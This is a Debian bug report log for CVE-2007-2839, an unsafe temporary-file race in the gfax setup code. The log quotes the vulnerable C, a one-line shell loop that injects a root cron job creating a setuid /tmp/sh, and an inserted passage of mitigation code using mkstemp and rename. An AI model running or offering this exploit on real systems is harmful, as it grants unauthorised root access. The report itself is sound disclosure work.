Debian Bug report logs - #431893
CVE-2007-2839: Trivial local-root attack


Package: gfax; Maintainer for gfax is Debian CLI Applications Team <pkg-cli-apps-team@lists.alioth.debian.org>; Source for gfax is src:gfax (PTS, buildd, popcon).

Reported by: Steve Kemp <skx@debian.org>

Date: Thu, 5 Jul 2007 19:49:32 UTC

Severity: grave

Tags: security

Found in version gfax/0.4.2-11

Done: Steve Kemp <skx@debian.org>

Bug is archived. No further changes may be made.



Report forwarded to debian-bugs-dist@lists.debian.org, Mirco Bauer <meebey@debian.org>:
Bug#431893; Package gfax.


Acknowledgement sent to Steve Kemp <skx@debian.org>:
New Bug report received and forwarded. Copy sent to Mirco Bauer <meebey@debian.org>.


Message #5 received at submit@bugs.debian.org:

From: Steve Kemp <skx@debian.org>
To: submit@bugs.debian.org
Subject: CVE-2007-2839: Trivial local-root attack
Date: Thu, 5 Jul 2007 20:47:54 +0100
Package: gfax
Version: 0.4.2-11
Severity: grave
Usertags: sourcescan
Tags: security

*** Please type your report below this line ***


  The gfax package, as released in Sarge, makes unsafe use of temporary files,
 which allows local users to gain root trivially.

  Etch, Lenny, and Sid are unaffected.


  The following code is in src/mgetty_setup.c:

    /* if it's NULL then nuke the faxrunq crontab entry.  */
    if ((fin = fopen("/etc/crontab", "r")) == NULL) {
        do_message(_("\nCan't open /etc/crontab\n"));
        return;
    }
    if ((fout = fopen("/tmp/crontab", "w")) == NULL) {
        do_message(_("\nCan't create /tmp/crontab\n"));
        return;
    }
    
    while (fgets(buf, 128, fin) != NULL) {
            fputs(buf, fout);
    }
    fclose(fout);
    fclose(fin);

    /* now copy the new file back to /etc */
    if ((fin = fopen("/tmp/crontab", "r")) == NULL) {
        do_message(_("\nCan't open /tmp/crontab\n"));
        return;
    }
    if ((fout = fopen("/etc/crontab", "w")) == NULL) {
        do_message(_("\nCan't create /etc/crontab\n"));
        return;
    }

    while ((c = fgetc(fin)) != EOF)
        fputc(c, fout);

    fclose(fout);
    fclose(fin);
    remove("/tmp/crontab");


  This can be abused to write arbitrary commands to the /etc/crontab file.

  If /tmp/crontab exists already, owned by a non-root user, then it will
 be truncated and trashed.  However, the ownership will still remain that
 of the non-root user - so a race condition between the first copy
 and the second copy can allow arbitrary line(s) to be appended to /etc/crontab.

  The following exploits this easily:

skx@vain:~$ while true; do echo "*/1 * * * * root /bin/cp /bin/sh /tmp && chmod 4755 /tmp/sh" > /tmp/crontab; done

  When root runs the setup program things end up like this:

skx@vain:~$ ls -l /etc/crontab 
-rw-r--r-- 1 root root 60 2007-07-02 20:27 /etc/crontab

skx@vain:~$ cat /etc/crontab
*/1 * * * * root /bin/cp /bin/sh /tmp && chmod 4755 /tmp/sh

skx@vain:~$ ls -l /tmp/sh
-rwsr-xr-x 1 root root 769368 2007-07-02 20:28 /tmp/sh


Steve
-- 
http://www.steve.org.uk/
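The root cause above is a fixed, predictable, world-writable temporary path (/tmp/crontab) that is opened with fopen(..., "w"), so a pre-existing file owned by another user is reused and its owner can keep rewriting it between the two copies. The following is an added example, not gfax code and not part of the bug report, showing the usual mitigation: create the scratch file with mkstemp() in the same root-only directory as the target, write the filtered content there, and atomically rename() it over the original. The function names rewrite_without_marker and selfcheck are this example's own; the "faxrunq" marker is taken from the comment in the excerpt, and the sample crontab lines in selfcheck are constructed for the demonstration.

```c
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Rewrite `path`, dropping every line that contains `marker`.
 * Returns 0 on success, -1 on failure (errno is left set by the failing call).
 * The temporary file is created beside the target, never in /tmp, with
 * mkstemp() (O_CREAT|O_EXCL, mode 0600), so a pre-planted file is never
 * reused and no other user can write to it while it is being filled. */
int rewrite_without_marker(const char *path, const char *marker)
{
    char tmppath[4096];
    char buf[1024];
    struct stat st;
    FILE *fin, *fout = NULL;
    int fd;

    if (snprintf(tmppath, sizeof tmppath, "%s.XXXXXX", path) >= (int)sizeof tmppath) {
        errno = ENAMETOOLONG;
        return -1;
    }
    if ((fin = fopen(path, "r")) == NULL)
        return -1;
    if (fstat(fileno(fin), &st) != 0) {          /* keep the original mode bits */
        fclose(fin);
        return -1;
    }
    if ((fd = mkstemp(tmppath)) < 0) {
        fclose(fin);
        return -1;
    }
    if ((fout = fdopen(fd, "w")) == NULL) {
        close(fd);
        unlink(tmppath);
        fclose(fin);
        return -1;
    }
    while (fgets(buf, sizeof buf, fin) != NULL) {
        if (marker != NULL && strstr(buf, marker) != NULL)
            continue;                             /* this is the entry being removed */
        if (fputs(buf, fout) == EOF)
            goto fail;
    }
    if (ferror(fin) || fchmod(fd, st.st_mode & 07777) != 0)
        goto fail;
    if (fflush(fout) != 0 || fsync(fd) != 0)
        goto fail;
    if (fclose(fout) != 0) {                      /* fd is closed even on failure */
        fout = NULL;
        goto fail;
    }
    fclose(fin);
    /* Atomic replace: readers see the old or the new file, never a truncated one,
     * and there is no window in which an attacker-controlled file is copied. */
    if (rename(tmppath, path) != 0) {
        unlink(tmppath);
        return -1;
    }
    return 0;

fail:
    if (fout != NULL)
        fclose(fout);
    fclose(fin);
    unlink(tmppath);
    return -1;
}

/* Exercise the rewrite on a scratch copy (constructed sample, not /etc/crontab).
 * Returns 0 when the faxrunq line is gone, the other lines are intact and no
 * temporary file is left behind; a non-zero code identifies the failing step. */
int selfcheck(void)
{
    char dir[] = "/tmp/crontab-demo.XXXXXX";     /* scratch directory for the demo */
    char path[4096], got[1024] = {0};
    const char *sample =
        "SHELL=/bin/sh\n"
        "17 * * * * root cd / && run-parts --report /etc/cron.hourly\n"
        "*/5 * * * * root /usr/bin/faxrunq\n";
    const char *want =
        "SHELL=/bin/sh\n"
        "17 * * * * root cd / && run-parts --report /etc/cron.hourly\n";
    FILE *f;
    int rc = 0;

    if (mkdtemp(dir) == NULL) return 1;
    snprintf(path, sizeof path, "%s/crontab", dir);
    if ((f = fopen(path, "w")) == NULL) return 2;
    fputs(sample, f);
    fclose(f);
    chmod(path, 0644);

    if (rewrite_without_marker(path, "faxrunq") != 0) rc = 3;
    else if ((f = fopen(path, "r")) == NULL) rc = 4;
    else {
        size_t n = fread(got, 1, sizeof got - 1, f);
        got[n] = '\0';
        fclose(f);
        if (strcmp(got, want) != 0) rc = 5;
    }
    unlink(path);
    if (rmdir(dir) != 0 && rc == 0) rc = 6;       /* a leftover temp file blocks rmdir */
    return rc;
}

int main(void)
{
    return selfcheck();
}
```

The key properties are that the scratch file is created with O_EXCL in a directory the attacker cannot write to, so there is no file to plant and nothing to race against, and that rename() replaces the target in one step rather than truncating it and then copying. Note that the gfax code also dropped the target's permissions by reopening it with "w"; fchmod() on the new file preserves them.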



Information forwarded to debian-bugs-dist@lists.debian.org, Mirco Bauer <meebey@debian.org>:
Bug#431893; Package gfax.


Acknowledgement sent to Steve Kemp <skx@debian.org>:
Extra info received and forwarded to list. Copy sent to Mirco Bauer <meebey@debian.org>.


Message #10 received at 431893@bugs.debian.org:

From: Steve Kemp <skx@debian.org>
To: 431893@bugs.debian.org
Cc: 431893-done@bugs.debian.org
Subject: Re: Bug#431893: Acknowledgement (CVE-2007-2839: Trivial local-root attack)
Date: Thu, 5 Jul 2007 21:12:59 +0100
  This is fixed in DSA-1329-1.  Just reported here for reference.

Steve
-- 



Reply sent to Steve Kemp <skx@debian.org>:
You have taken responsibility.


Notification sent to Steve Kemp <skx@debian.org>:
Bug acknowledged by developer.


Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Fri, 03 Aug 2007 07:45:40 GMT)




Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Sun Mar 1 12:23:54 2020; Machine Name: beach
